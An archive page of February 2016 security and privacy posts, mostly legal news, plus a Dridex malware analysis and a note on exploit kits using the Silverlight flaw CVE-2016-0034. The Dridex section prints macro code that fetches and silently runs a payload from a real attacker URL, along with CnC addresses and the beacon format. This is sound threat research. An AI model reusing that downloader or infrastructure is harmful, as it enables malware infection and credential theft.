Monthly Archives: February 2016

European Commission Presents EU-U.S. Privacy Shield

On February 29, 2016, the European Commission issued the legal texts that will implement the EU-U.S. Privacy Shield. These texts include a draft adequacy decision from the European Commission, Frequently Asked Questions and a Communication summarizing the steps that have been taken in the last few years to restore trust in transatlantic data flows.

The agreement in support of the new EU-U.S. transatlantic data transfer framework, known as the EU-U.S. Privacy Shield, was reached on February 2, 2016, between the U.S. Department of Commerce and the European Commission. Once adopted, the adequacy decision will establish that the safeguards provided when transferring personal data pursuant to the new EU-U.S. Privacy Shield are equivalent to the EU data protection standards. In addition, the European Commission has stated that the new framework reflects the requirements that were set forth by the Court of Justice of the European Union (the “CJEU”) in the recent Schrems decision.

The EU-U.S. Privacy Shield

The new framework provides a response to the concerns that have been raised by the European Commission and the CJEU with respect to transatlantic data transfers. It contains stronger commitments that must be undertaken by companies in the commercial sector, but also significant commitments with respect to the U.S. government’s access to personal data. The four most important aspects of the Privacy Shield are:

Enhanced obligations on companies and robust enforcement. Companies that are willing to transfer personal data from the EU to the U.S. must accept more stringent obligations regarding the processing of personal data and how individuals’ rights are guaranteed. Among other limitations introduced by the new framework, onward data transfers will be subject to more onerous requirements and liability provisions.

The Privacy Shield also will include stricter oversight mechanisms to help ensure that companies abide by their commitments, including regular monitoring by the U.S. Department of Commerce. Companies that fail to comply will face severe sanctions or exclusion from the framework.

Limits and safeguards regarding access to personal data by the U.S. government. The European Commission has obtained written assurances from the U.S. government (i.e., the Department of Justice and the Office of the Director of National Intelligence) that access to personal data by government authorities for law enforcement, national security and other public interest purposes will be subject to clear limitations, safeguards and oversight mechanisms.

Effective protection of EU citizens’ privacy rights and redress possibilities. Several affordable mechanisms to obtain individual redress will be available to data subjects who think their personal data has been misused under the new framework, whether via a direct complaint to the company or to their national data protection authority (“DPA”). Complaints made to a DPA will be referred to the U.S. Department of Commerce and the Federal Trade Commission for investigation. When receiving a complaint directly from individuals, companies must reply within 45 days. Companies handling personal data in the Human Resources context about European individuals must comply with the decisions of the competent DPA. In addition, companies also must designate an independent dispute resolution body to investigate and resolve individuals’ complaints and provide complimentary recourse to the individuals.

Further, in the context of a company’s certification, the Department of Commerce will verify that the company complies with the Privacy Principles of the Privacy Shield, and that it has designated an independent recourse mechanism. As a last resort, individuals will be able to bring their complaints to a newly-created Privacy Shield Panel, a dispute resolution body that can take binding and enforceable action against U.S. companies that have certified their adherence to the Privacy Shield.

EU citizens also will have a redress mechanism in the national security context. In particular, an independent Ombudsperson will be responsible for handling complaints and inquiries received from EU individuals regarding access to their data by national intelligence authorities. This redress mechanism will be extended beyond the EU-U.S. Privacy Shield and will be available to individuals for all data transfers to the U.S. for commercial purposes.

Annual joint review mechanism. The European Commission will annually monitor the functionality of all aspects of the EU-U.S. Privacy Shield, together with the U.S. Department of Commerce, EU DPAs, U.S. national security authorities and the Ombudsperson. Other sources of information, such as voluntary transparency reports, will also be used for monitoring the functionality of the framework. In the event that companies or public authorities do not comply with their commitments, the European Commission can activate a process to suspend the Privacy Shield.

Going Forward

The Commission encourages companies to prepare for the Privacy Shield so that they are in a position to self-certify to the new framework as soon as an adequacy decision is adopted by the Commission. In general, the various constituents involved in the new framework will be required to take the following actions in connection with the Privacy Shield:

U.S. Companies. U.S. companies must commit to comply with seven privacy principles, including (1) the Notice Principle, (2) the Choice Principle, (3) the Security Principle, (4) the Data Integrity and Purpose Limitation Principle, (5) the Access Principle, (6) the Accountability for Onward Transfer Principle, and (7) the Recourse, Enforcement and Liability Principle. In addition, the European Commission encourages companies to (i) select the EU DPAs as their complaint resolution mechanism under the Privacy Shield, and (ii) publish transparency reports on national security and law enforcement access requests regarding EU personal data.

U.S. Authorities. U.S. authorities will be responsible for enforcing the framework and respecting the limitations and safeguards established regarding access to personal data by law enforcement and for national security purposes. U.S. authorities also must handle complaints received from EU individuals in a timely and effective manner.

EU Data Protection Authorities. EU DPAs must ensure that individuals can exercise their rights effectively, including by transferring their complaints to the competent U.S. authority, as well as cooperating with the relevant U.S. authority. In particular, EU DPAs must assist complainants with cases brought in front of the Privacy Shield Panel, exercise oversight over transfers of EU HR personal data and trigger the Ombudsperson mechanism.

European Commission. The European Commission will adopt an adequacy decision that will be reviewed regularly, allowing the Privacy Shield to be consistently monitored, in contrast with the previous Safe Harbor.

Next Steps

An extraordinary plenary meeting of the Article 29 Working Party will be organized at the end of March 2016. After obtaining the non-binding opinion of the Working Party and consulting a committee composed of representatives of the EU Member States, a final decision by the College of Commissioners will be made. In the meantime, U.S. authorities will prepare for the implementation of the new framework.

FTC Chairwoman Edith Ramirez issued a statement in response to the release of the new framework. She said that “[t]he EU-U.S. Privacy Shield Framework supports the growing digital economy on both sides of the Atlantic, while ensuring the protection of consumers’ personal information. In providing an important legal mechanism for transatlantic data transfers, it benefits both consumers and business in the global economy.” Chairwoman Ramirez also emphasized the FTC’s role, saying that “the FTC will make enforcement of the new framework a high priority, and we will work closely with our European counterparts to provide robust privacy and data security protections for consumers in the United States and Europe.”

Read the Press Release of the European Commission.

Read the Fact Sheet on the EU-U.S. Privacy Shield.

For more information, visit the dedicated page on the European Commission’s website.

Security Weekly #453 – Jeff Frisk & Jeff Pike, Global Information Assurance Certification

This week on Security Weekly we interview Jeff Pike and Jeff Frisk from SANS GIAC, talking digital badges, CPEs, and SANS training. Then Paul, Larry, and Mike cover the Hacker Summer Camp Planning Guide, the OpenDNS blog, wireless mics and keyboards, and excessive amounts of lube! Stay tuned for the best in security news.

President Obama Signs Judicial Redress Act into Law

On February 24, 2016, President Obama signed the Judicial Redress Act (the “Act”) into law. The Act grants non-U.S. citizens certain rights, including a private right of action for alleged privacy violations that occur in the U.S. The Act was signed after Congress approved an amendment that limits the right to sue to only those citizens of countries which (1) permit the “transfer of personal data for commercial purposes” to the U.S., and (2) do not impose personal data transfer policies that “materially impede” U.S. national security interests.

As we previously reported, the passing of the Judicial Redress Act is an important step that may help facilitate the approval of the new EU-U.S. Privacy Shield by European regulators. It also impacts the 2015 draft agreement known as the Protection of Personal Information Relating to the Prevention, Investigation, Detection and Prosecution of Criminal Offenses (the “Umbrella Agreement”). The Umbrella Agreement was conditioned on the passing of the Judicial Redress Act.

In addition to the private right of action, the Act grants non-U.S. citizens certain other rights afforded to U.S. citizens under the Privacy Act of 1974. These include the right to request access to records shared by their governments with a U.S. federal agency in the course of a criminal investigation and to amend any inaccuracies in those records.

CJEU Hears Arguments Regarding Whether IP Addresses are Personal Data

On February 25, 2016, the Court of Justice of the European Union (“CJEU”) heard arguments on two questions referred by the German Federal Court of Justice (Bundesgerichtshof). The first question was whether or not IP addresses constitute personal data and therefore cannot be stored beyond what is necessary to provide an Internet service. The German court referred the questions to the CJEU for a preliminary ruling in connection with a case that arose in 2008 when a German citizen challenged the German federal government’s storage of the dynamic IP addresses of users on government websites. The citizen’s claim initially was rejected by the court of first instance. The claim was granted, however, by the court of second instance to the extent it referred to the storage of IP addresses after the users left the relevant government websites. Subsequently, both parties appealed the decision to the German Federal Court of Justice. The CJEU may follow its 2011 decision in which it confirmed that IP addresses are personal data.

The second question referred to the CJEU is whether a provision of the German Telemedia Act is compatible with the EU Data Protection Directive 95/46/EC. Under the relevant provision of the Telemedia Act, a website provider may collect and process users’ personal data without their consent only to the extent necessary to (1) enable the general functionality of the website or (2) arrange payment.

What’s New with Dridex

Credit: Christopher D. Del Fierro, Lead Malware Research Engineer, ThreatTrack Security

We have seen Dridex since 2014, and it is still active in the wild today. This research focuses on analyzing Dridex and on how it remains undetected by most antivirus engines. For those not familiar with Dridex, it is malspam (malware delivered via spam email) that targets Windows systems with the intent to steal credentials and siphon money from a victim’s bank account.

Malware authors, not surprisingly, always try to come up with something new to avoid detection and make the researcher’s life more difficult. At a quick overview, there is nothing new in Dridex’s infection sequence, but its authors have made some upgrades and workarounds to avoid detection, which we discuss in detail below.

INFECTION CHAIN SUMMARY

[Figure: Dridex infection chain]

IN-DEPTH ANALYSIS

As most Dridex samples come through spam, this new variant is no different. We recently caught a sample with an email attachment named “Payment Confirmation 98FD41.doc.” Although the attachment carries a .doc extension, it is not in DOC file format but is actually a malformed MHT. MHT is an archive format for web pages that is usually opened with Internet Explorer by default.

[Screenshot: the malformed MHT viewed in Hiew]

The malware author purposely crafted bytes before the string “MIME-version,” which signifies the start of an actual MHT file. This was done in an attempt to make some antivirus scanner engines misclassify the file as TXT or some other format rather than MHT.

This MHT file contains an embedded DOC file. The DOC file is the one containing the VBA (Visual Basic for Applications) macro code responsible for downloading and executing Dridex, unbeknownst to the user.

On most systems running Microsoft Windows, MHT files are loaded by Internet Explorer while DOC files are loaded by Microsoft Word, unless an advanced user changes the default application associations. Because of those defaults, the malware author deliberately gave the malformed MHT file a .doc extension, fooling the system into loading it via Microsoft Word. And if macros are enabled in Microsoft Word, it will continue its infection routine, downloading and executing Dridex in the background.

As of this writing, executing “Payment Confirmation 98FD41.doc” in a sandbox environment with macros enabled produces a VBA error, because the site it attempts to connect to is now down.

[Screenshot: the document opened in Microsoft Word]

Pressing Alt+F8 in Microsoft Word takes us to the Macros screen. As you can see, it has two macro functions, AutoOpen and FYFChvhfygDGHds.

[Screenshot: the Macros dialog showing AutoOpen and FYFChvhfygDGHds]

Attempting to click “Edit” will prompt a request for a password, which, of course, could be anything.

[Screenshot: the macro password prompt]

This makes things a bit more challenging, but we can extract the information using a more unconventional method.

Since “Payment Confirmation 98FD41.doc” is actually an MHT file containing an embedded DOC file, the first step is to rename it with an .eml extension: “Payment Confirmation 98FD41.eml.” We then opened it using Microsoft Outlook (though whatever email client is currently in use will suffice). Once renamed to .eml, the embedded objects in “Payment Confirmation 98FD41.doc” appear as attachments. We then browsed the attachments, looking for a file that starts with the string “ActiveMime” when viewed in a hex editor.
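Because MHT is just MIME, the same triage can be scripted without any email client. Here is a minimal Python sketch (standard library only; the file name is this sample’s) that pulls out every part whose decoded body starts with the “ActiveMime” magic:

import email

with open("Payment Confirmation 98FD41.eml", "rb") as f:
    msg = email.message_from_binary_file(f)

# Walk every MIME part; keep the ones whose decoded payload starts
# with the "ActiveMime" magic string.
for i, part in enumerate(msg.walk()):
    payload = part.get_payload(decode=True)  # None for multipart containers
    if payload and payload.startswith(b"ActiveMime"):
        out = "part_%02d.mso" % i
        with open(out, "wb") as o:
            o.write(payload)
        print("ActiveMime part saved to", out)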

[Screenshot: the renamed .eml opened in Outlook]

This file format is MSO, which is not readable by the naked eye. Since this is old-school malware, we were lucky to have kept an old-school tool called UNMSO.EXE, which, as the name implies, unpacks the MSO. The tool outputs a “true” DOC file. And yes, it holds our malicious VBA macro code inside.
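For those without the tool, here is a hedged Python sketch of what UNMSO.EXE does under the hood: ActiveMime/MSO containers carry a zlib-compressed copy of the real document. The compressed stream usually begins near offset 0x32, but since that can vary, the sketch scans for the common zlib header instead (the input file name carries over from the previous sketch):

import zlib

data = open("part_02.mso", "rb").read()   # output of the previous step
assert data.startswith(b"ActiveMime")

start = data.find(b"\x78\x9c")            # default-compression zlib header
doc = zlib.decompress(data[start:])
open("extracted.doc", "wb").write(doc)

# A "true" DOC is an OLE2 compound file; check its magic bytes.
print("OLE header present:", doc.startswith(b"\xd0\xcf\x11\xe0"))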

[Screenshot: the ActiveMime file unpacked to a DOC]

Quickly examining the DOC file output, we can see the naked strings “http://31.131.24.203/indiana/jones.php” and “\yFUYIdsf.exe” in its body.

[Screenshot: olevba output]

We then used a tool called olevba.py (http://www.decalage.info/python/olevba) to extract the VBA macro source code and write the results to a text file.
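olevba also ships inside the oletools Python package, so the extraction can be scripted as well. A short sketch using its documented API (the input file name is ours from the earlier steps):

from oletools.olevba import VBA_Parser

vbaparser = VBA_Parser("extracted.doc")
if vbaparser.detect_vba_macros():
    # extract_macros() yields (container, stream path, VBA filename, source).
    for _, stream_path, vba_filename, vba_code in vbaparser.extract_macros():
        print("-" * 60)
        print("Stream:", stream_path, "Module:", vba_filename)
        print(vba_code)
vbaparser.close()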

Typical of VBA macro malware, the code is obfuscated and padded with useless statements in an attempt to confuse the researcher analyzing it. The listing is pretty lengthy, so only the important lines are shown here.

pjIOHdsfc = UserForm1.TextBox1   ' points to the string http://31.131.24.203/indiana/jones.php
dTYFidsff = Environ(StrReverse("PMET")) & UserForm1.TextBox2   ' "PMET" reversed is "TEMP"; TextBox2 points to \yFUYIdsf.exe
Dim erDTFGHJkds As Object
Set erDTFGHJkds = CreateObject(StrReverse("1.5.tseuqerPTTHniW.PTTHniW"))   ' reverses to "WinHTTP.WinHTTPrequest.5.1"
erDTFGHJkds.Open StrReverse("TEG"), pjIOHdsfc, False   ' "TEG" reversed is "GET"
erDTFGHJkds.Send
Open dTYFidsff For Binary Access Write As #yFVHJBkdsf
sjdhfbk = Shell(dTYFidsff, vbHide)   ' run the downloaded payload with a hidden window

The VBA Open command is responsible for connecting and downloading Dridex, while the VBA Shell command is responsible for executing it. In this example, it downloads Dridex from http://31.131.24.203/indiana/jones.php, which is then saved and executed as %TEMP%\yFUYIdsf.exe.

DOWNLOADED DRIDEX EXECUTABLE

The downloaded Dridex executable has an MD5 of EBB1562E4B0ED5DB8A646710F3CD2EB8. Analyzing this executable is like peeling an orange: we have to remove the outer layer first to get to the good stuff. We can break the Dridex executable into two parts: the Decoder and the Naked Dridex.

THE DECODER

A quick glance at its entry point suggests a Microsoft Visual C++ 6.0 compiled program. In fact, it really is Microsoft Visual C++ 6.0, except that the usual execution flow is not followed: Dridex code is inserted right before WINMAIN is called (WINMAIN being the usual go-to entry point of a C++ 6.0 compiled executable). The malware author did this in an attempt to hide the code from researchers. There are also a bunch of useless code blocks, strings, loops and Windows APIs to throw off researchers during debugging.

The code looks for the kernel32.VirtualAlloc API by traversing kernel32.dll’s export table and comparing each exported name’s hash against “3A8E4D14h,” computed with its own hashing algorithm.
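Dridex’s own hashing algorithm is not reproduced here. As an illustration of the general technique, this sketch uses the classic ROR13 hash popular in shellcode; like Dridex’s loader, it resolves an API by comparing name hashes against a precomputed constant so that no API string ever appears in the binary:

# Illustration only: this is NOT Dridex's algorithm, just the common
# ROR13 name hash used to show hash-based API resolution.
def ror13_hash(name: bytes) -> int:
    h = 0
    for c in name:
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF  # rotate right by 13
        h = (h + c) & 0xFFFFFFFF
    return h

# A loader walks the export table and compares each name's hash to a
# hardcoded constant (Dridex compares against 3A8E4D14h).
exports = [b"CloseHandle", b"VirtualAlloc", b"LoadLibraryA"]
target = ror13_hash(b"VirtualAlloc")
print(next(n for n in exports if ror13_hash(n) == target))  # b'VirtualAlloc'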

[Screenshot: the decoder calling VirtualAlloc]

It uses an unconventional PUSH DWORD OFFSET – RETN combination instead of a direct CALL DWORD approach to hide its procedure calls.

[Screenshot: the PUSH-RETN combination]

Once kernel32.VirtualAlloc has been resolved and saved, the malware uses it to allocate 5A44h bytes of memory, decrypts code into the allocated space, and then transfers execution to it.

It then traverses kernel32.dll again to get the base image address and populate its API table, which is needed for further unpacking. Using GetProcAddress, it resolves the addresses of the following APIs:

CloseHandle

CreateThread

CreateToolhelp32Snapshot

EnterCriticalSection

EnumServicesStatusExA

FreeConsole

GetCurrentProcessId

GetCurrentThreadId

GlobalAlloc

GlobalFree

InitializeCriticalSection

IsBadReadPtr

LeaveCriticalSection

LoadLibraryA

OpenSCManagerA

RegCloseKey

RegOpenKeyExA

RtlDecompressBuffer

RtlZeroMemory

Thread32First

Thread32Next

VirtualAlloc

VirtualFree

VirtualProtect

ZwCreateFile

ZwCreateThread

ZwCreateThreadEx

ZwCreateUserProcess

ZwOpenFile

ZwOpenProcess

ZwProtectVirtualMemory

ZwQueueApcThread

ZwSetContextThread

ZwSetValueKey

ZwSuspendThread

ZwTerminateProcess

ZwWriteVirtualMemory

After a series of debugging through obfuscated code and decrypting, it finally lands on RtlDecompressBuffer, which decompresses an MZ-PE file in memory; execution is then transferred to it via CreateThread. This decompressed executable (we call it Naked Dridex) had long been detected as Trojan.Win32.Dridex.aa (v) by VIPRE. In other words, this variant of the Dridex executable was already caught in the past, which is why ThreatTrack’s VIPRE Antivirus detects it with a heuristic pattern. The only difference now is that it is wrapped in a “new” protective layer as a means of bypassing most antivirus engines.

We also made another interesting discovery while debugging: the malware attempts to hide its tracks using the Windows API FreeConsole. According to MSDN, FreeConsole detaches the calling process from its console.

[Screenshot: PEiD output]

Since this executable is built for the Win32 console subsystem, you should see a console window pop up and then close abruptly if you run it in a Windows environment (i.e., double-click to execute). This means it has detached itself from the console but continues running in the background. One way to test this theory is to execute the malware from CMD.EXE: you will see that no further input is accepted, because FreeConsole detached the malware from CMD.EXE. Even pressing “CTRL-C” or “CTRL-BREAK,” or closing CMD.EXE altogether, will not stop it from progressing.
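The trick is trivial to reproduce. A two-line Python equivalent (Windows only, illustrative): run it from CMD.EXE and the process releases the console exactly as described, while continuing to run.

import ctypes
import time

ctypes.windll.kernel32.FreeConsole()  # detach from the parent console
time.sleep(30)                        # ...but keep running in the background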

THE NAKED DRIDEX 

This is where it all gets interesting. Although we have peeled off most of its outer layer, this malware still has plenty of obfuscated code within it. Note that its Import Address Table is zeroed out, meaning that at some point it will have to populate the IAT itself.

[Screenshot: the zeroed Import Address Table]

The following Windows APIs will be used:

AllocateAndInitializeSid

CharLowerA

CloseHandle

CommandLineToArgvW

CompareStringA

CreateFileW

CryptAcquireContextW

CryptCreateHash

CryptDestroyHash

CryptGenRandom

CryptGetHashParam

CryptHashData

CryptReleaseContext

DeleteFileW

EqualSid

ExitProcess

ExpandEnvironmentStringsW

FindClose

FindFirstFileW

FindNextFileW

FreeSid

GetCurrentProcess

GetFileAttributesW

GetLastError

GetTokenInformation

GetVersionExW

HeapAlloc

HeapCreate

HeapFree

HeapSize

HeapValidate

HttpOpenRequestW

HttpQueryInfoW

HttpSendRequestW

InternetCloseHandle

InternetConnectW

InternetOpenA

InternetQueryOptionW

InternetReadFile

InternetSetOptionW

IsWow64Process

LoadLibraryW

MultiByteToWideChar

OpenProcessToken

RegCloseKey

RegEnumKeyA

RegOpenKeyExA

RegQueryValueExA

RemoveDirectoryW

RtlComputeCrc32

RtlFillMemory

RtlGetLastWin32Error

RtlMoveMemory

SetFileAttributesW

SetFilePointer

Sleep

WideCharToMultiByte

WTSEnumerateSessionsW

WTSFreeMemory

WTSQueryUserToken

wvnsprintfW

Previous versions of Dridex carry a CnC configuration that is usually easy to find and decrypt with a linear XOR, or that even appears in plain text in the body, like this:

<config botnet="xxx">
   <server_list>
      37.139.47.105:80
      66.110.179.66:8080
      5.39.99.18:80
      136.243.237.218:80
   </server_list>
</config>

With this version, however, the settings are stored in the .data section as raw hex, just to make them harder for a researcher to distinguish.

[Screenshot: the CnC settings in Hiew]

Decoding them to their ASCII counterparts yields the following settings (a small decoding helper follows the list):

Bot version: 0x78 = 120

CnC Servers:

0xB9.0x18.0x5C.0xE5:0x1287 = 185.24.92.229:4743

0x67.0xE0.0x53.0x82:0x102F = 103.224.83.130:4143

0x2E.0x65.0x9B.0x35:0x0477 = 46.101.155.53:1143

0x01.0xB3.0xAA.0x07:0x118D = 1.179.170.7:4493
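A small Python helper reproducing the conversion above (the four entries are copied from the sample’s .data section):

# Decode Dridex CnC entries: four hex octets (IPv4) plus a 16-bit hex port.
raw = ["B9.18.5C.E5:1287", "67.E0.53.82:102F",
       "2E.65.9B.35:0477", "01.B3.AA.07:118D"]

for entry in raw:
    addr, port = entry.split(":")
    ip = ".".join(str(int(octet, 16)) for octet in addr.split("."))
    print("%s:%d" % (ip, int(port, 16)))
# -> 185.24.92.229:4743, 103.224.83.130:4143, 46.101.155.53:1143, 1.179.170.7:4493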

Dridex collects information to fingerprint the infected system. Data such as the Windows version and Service Pack, computer name, username, install date and installed software is gathered and sent to a CnC server.

A module name unique to the infected system is generated by computing the MD5 of the combined data from the following registry entries:

Key: HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/ComputerName/ComputerName

Name: ComputerName

Key: HKEY_LOCAL_MACHINE/Volatile Environment

Name: USERNAME

Key: HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion

Name: InstallDate

The MD5 result is appended to the ComputerName, joined with the character “_” (e.g., “WINXP_2449c0c0c6a9ffb4e33613709f4db358”).
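A rough reconstruction of that generation in Python, with caveats: the concatenation order and string encoding are assumptions, and while the list above places USERNAME under HKEY_LOCAL_MACHINE, the “Volatile Environment” key normally lives under HKEY_CURRENT_USER, which is what this sketch reads:

import hashlib
import winreg  # Windows only

def reg_value(root, path, name):
    with winreg.OpenKey(root, path) as key:
        return str(winreg.QueryValueEx(key, name)[0])

computer = reg_value(winreg.HKEY_LOCAL_MACHINE,
                     r"SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName",
                     "ComputerName")
user = reg_value(winreg.HKEY_CURRENT_USER, r"Volatile Environment", "USERNAME")
install = reg_value(winreg.HKEY_LOCAL_MACHINE,
                    r"SOFTWARE\Microsoft\Windows NT\CurrentVersion", "InstallDate")

digest = hashlib.md5((computer + user + install).encode()).hexdigest()
print("%s_%s" % (computer, digest))  # e.g. WINXP_2449c0c0c6a9ffb4e33613709f4db358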

It also gathers a list of installed software by enumerating the subkeys of HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall and reading their “DisplayName” and “DisplayVersion” values. For every subkey enumerated, it constructs a string in the format “DisplayName (DisplayVersion)”, with entries separated by “;” (a sketch follows).
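A sketch of the same inventory using Python’s standard winreg module, assuming a straightforward reading of the format described above:

import winreg  # Windows only

UNINSTALL = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
entries = []
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UNINSTALL) as root:
    for i in range(winreg.QueryInfoKey(root)[0]):  # number of subkeys
        sub = winreg.EnumKey(root, i)
        try:
            with winreg.OpenKey(root, sub) as key:
                name = winreg.QueryValueEx(key, "DisplayName")[0]
                version = winreg.QueryValueEx(key, "DisplayVersion")[0]
                entries.append("%s (%s)" % (name, version))
        except OSError:
            continue  # subkey lacks DisplayName/DisplayVersion
print(";".join(entries))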

It then attempts to delete AVG antivirus from an infected system by searching for AVG settings in the registry at “HKLM/SYSTEM/CurrentControlSet/services/Avg/SystemValues” and traversing the %LocalAppData% folder for AVG files. It even supports deleting future versions of AVG, from AVG2010 up to AVG2020.

We have noticed, though, what seems to be an irregularity in the malware author’s code: the product name is built as AVG20(%d), where %d starts at 20 and decrements by one (e.g., AVG2020, AVG2019, AVG2018, etc.). So when it reaches AVG2010, instead of decrementing to AVG2009, the names become AVG209, AVG208, AVG207, down to AVG206 (reproduced below).
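The bug is easy to reproduce: formatting “AVG20%d” with a counter that simply decrements gives exactly the sequence described.

# The author's loop in miniature: below 10 the intended AVG200x
# names never appear, only AVG209 ... AVG206.
for i in range(20, 5, -1):
    print("AVG20%d" % i)
# AVG2020, AVG2019, ... AVG2010, AVG209, AVG208, AVG207, AVG206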

This is the message format to be sent to a CnC:

<loader><get_module unique="%s" botnet="%d" system="%d" name="%s" bit="%d"/>

Sample message to send:

<loader><get_module unique="WINXP_2449c0c0c6a9ffb4e33613709f4db358" botnet="120" system="23120" name="list" bit="32"/><soft><![CDATA[4NT Unicode 6.0 (6.0);AOL Instant Messenger;CodeStuff Starter (5.6.2.0);Compuware DriverStudio 3.2 (3.2);HijackThis 1.99.1 (1.99.1);IDA Pro Advanced v5.0;InstallRite 2.5;mIRC (6.21);PE Explorer 1.96 (1.96);Viewpoint Media Player;VideoLAN VLC media player 0.8.6c(0.8.6c);Windows XP Service Pack 2 (20040803.231319);WinHex;WinPcap 4.0.1 (4.0.0.901);WinRAR archiver;Wireshark 0.99.6a (0.99.6a);Yahoo! Messenger;ActivePerl5.8.3 Build 809 (5.8.809);Debugging Tools for Windows (x86) (6.9.3.113);Microsoft Visual C++ 2008 Redistributable – x86 9.0.30729.4148 (9.0.30729.4148);Python 2.5.1 (2.5.1150);WebFldrs XP (9.50.5318);UltraEdit-32 (10.20c);Java 2 RuntimeEnvironment, SE v1.4.2_15 (1.4.2_15);Microsoft Office Professional Edition 2003 (11.0.5614.0);MSN Messenger 7.0 (7.0.0777);Adobe Reader 6.0 (6.0);VMware Tools (9.6.1.1378637);Compuware DriverStudio (3.2);Starting path: 5]]></soft></loader>

The malware then attempts to connect to its CnC servers over SSL using WinINet functions such as InternetConnectW and HttpOpenRequestW, and then sends the data gathered earlier using HttpSendRequestW.

[Screenshot: CnC traffic in Wireshark]

Upon a successful connection, the server even replies with a malicious SSL certificate, which SQUERT identified as Dridex.

[Screenshots: the malicious SSL certificate in SQUERT and Hiew]

At this point, the CnC server is supposed to issue a malicious DLL with an export function named “NotifierInit” and inject it into a running EXPLORER.EXE process; however, the CnCs on its list had already been taken down as of this writing.

WHAT TO DO?

To keep Dridex at bay, we recommend blocking it early, at the root of its infection chain. Here are some tips:

  • Always keep your operating system and security products up to date.
  • Take precautions when opening attachments, especially those sent by an unknown sender.
  • Never enable VBA macros by default for any Microsoft Office application. Some macro malware will even tell you how to enable macros or try to mislead you into doing so.
  • Leverage advanced threat defense tools like ThreatSecure Email to protect against spear-phishing and targeted malware attacks that bypass traditional defenses. Cybercriminals have developed increasingly sophisticated attacks to bypass anti-spam and email filtering technologies and infiltrate your network. ThreatSecure Email identifies suspicious emails, detects malicious attachments or links, and stops them before they can reach their target, without relying on signatures.

HASHES

A6844F8480E641ED8FB0933061947587 – malicious MHT attachment (LooksLike.MHT.Malware.a (v))

EBB1562E4B0ED5DB8A646710F3CD2EB8 – Dridex executable (Trojan.Win32.Generic!BT)

 


FTC Settles with Router Manufacturer over Software Security Flaws

On February 23, 2016, the Federal Trade Commission announced that it reached a settlement with Taiwanese-based network hardware manufacturer ASUSTeK Computer, Inc. (“ASUS”), to resolve claims that the company engaged in unfair and deceptive security practices in connection with developing network routers and cloud storage products sold to consumers in the U.S.

The settlement stems from an FTC complaint alleging that ASUS failed to securely design and maintain its network routers and cloud storage applications, which resulted in a number of software vulnerabilities impacting the security of its products and customers’ information. In the complaint, the FTC claimed that despite knowing about these security flaws, the company failed to mitigate them in a timely manner and provide prompt notice to customers about vulnerabilities that placed their network routers and sensitive personal information on network-connected devices at risk of compromise. According to the FTC, these security flaws resulted in hackers compromising thousands of customers’ ASUS routers and network-connected devices, including over 12,900 connected devices, in February 2014. In addition to alleging that the company failed to provide reasonable security in the design and maintenance of the software developed for its routers and related “cloud” features, the FTC’s complaint asserted that ASUS misrepresented the security of its products due to its alleged security failures.

The consent order entered into between ASUS and the FTC requires the company to notify consumers when a software update is available, or when the company is aware of reasonable steps that a consumer could take to mitigate a security flaw. The consent order also requires the company to maintain a comprehensive security program that is reasonably designed to (1) address security risks related to the development and management of new and existing network devices developed by the company, and (2) protect the privacy, security, confidentiality and integrity of individually-identifiable consumer information collected or handled by such devices. The company also is prohibited from misrepresenting the security of its products, including whether or not a product is using up-to-date software.

Files download information




After seven years of Contagio's existence, Google Safe Browsing notified Mediafire (the hoster of Contagio and Contagiominidump files) that "harmful" content is hosted on my Mediafire account.

The content is harmful only if you use it to harm your own PC; it is not meant for distribution or for infecting unsuspecting users. I have not yet been able to resolve this with Google and Mediafire.

Mediafire suspended public access to the Contagio account.

The file hosting will be moved.

If you need any files now, email me the posted Mediafire links (address in profile) and I will pull out the files and share via other methods.

P.S. I have not been able to resolve it "yet" because it just happened today, not because they refuse to help. I don't want to affect Mediafire's safety reputation and most likely will have to move out this time.

The main challenge is not finding hosting, which is not difficult and I can pay for it, but the effort of moving all the files and fixing the existing links on the blog, and there are many. I planned to move out a long time ago but did not have time for it. If anyone can suggest how to change all the Blogspot links in bulk, I will be happy.


P.P.S. Feb. 24 - The files will be moved to a Dropbox Business account and shared from there (the Dropbox team confirmed they can host it).


The transition will take some time, so email me links to what you need. 

Thank you all
M

CVE-2016-0034 (Silverlight up to 5.1.41105.0) and Exploit Kits




Fixed with the January 2016 Microsoft patches, CVE-2016-0034 (MS16-006) is a Silverlight memory corruption vulnerability. It was spotted by Kaspersky using rules written to hunt for Vitaliy Toropov's unknown Silverlight exploit mentioned in the Hacking Team leak.

Angler EK:

On 2016-02-18, the Angler landing page changed slightly to integrate this piece of code:

Silverlight integration snippet from the Angler landing page, after decoding
2016-02-18

resulting in a new call if silverlight is installed on the computer:

Angler EK replying without a body to the Silverlight call
Here is a pass in Great Britain dropping Vawtrak via Bedep buildid 7786
2016-02-18
I tried all the instances I could find, and the same behavior occurred on all of them.

2016-02-22: Here we go: the calls are not empty anymore.
Angler EK dropping Teslacrypt via Silverlight 5.1.41105.0 after the "EITest" redirect
2016-02-22
I made a pass with Silverlight 5.1.41212.0: safe.

Edit 1: I received confirmation that it's indeed CVE-2016-0034 from multiple analysts, including Anton Ivanov (Kaspersky). Thanks!


Xap file: 01ce22f87227f869b7978dc5fe625e16
Dll: 22a9f342eb367ea9b00508adb738d858
Out of topic payload: 6a01421a9bd82f02051ce6a4ea4e2edc (Teslacrypt)
Fiddler sent here

RIG:
2016-03-29
Malc0de spotted modifications in the RIG landing page indicating integration of the Silverlight exploit.
Here is a pass where Silverlight is fired and successfully exploited. CVE identification by Anton Ivanov (Kaspersky).
RIG - CVE-2016-0034 - 2016-03-29

Xap file in that pass: acb74c05a1b0f97cc1a45661ea72a67a080b77f8eb9849ca440037a077461f6b
containing this dll: e535cf04335e92587f640432d4ec3838b4605cd7e3864cfba2db94baae060415
(Out of topic payload: Qbot 3242561cc9bb3e131e0738078e2e44886df307035f3be0bd3defbbc631e34c80)
Files: Fiddler and sample (password is malware)

Reading:
The Mysterious Case of CVE-2016-0034: the hunt for a Microsoft Silverlight 0-day - 2016-01-13 - Costin Raiu & Anton Ivanov - Kaspersky

Post Publication Reading:
(PDF) Analysis of Angler's new silverlight Exploit - 2016-03-10 - Bitdefender Labs

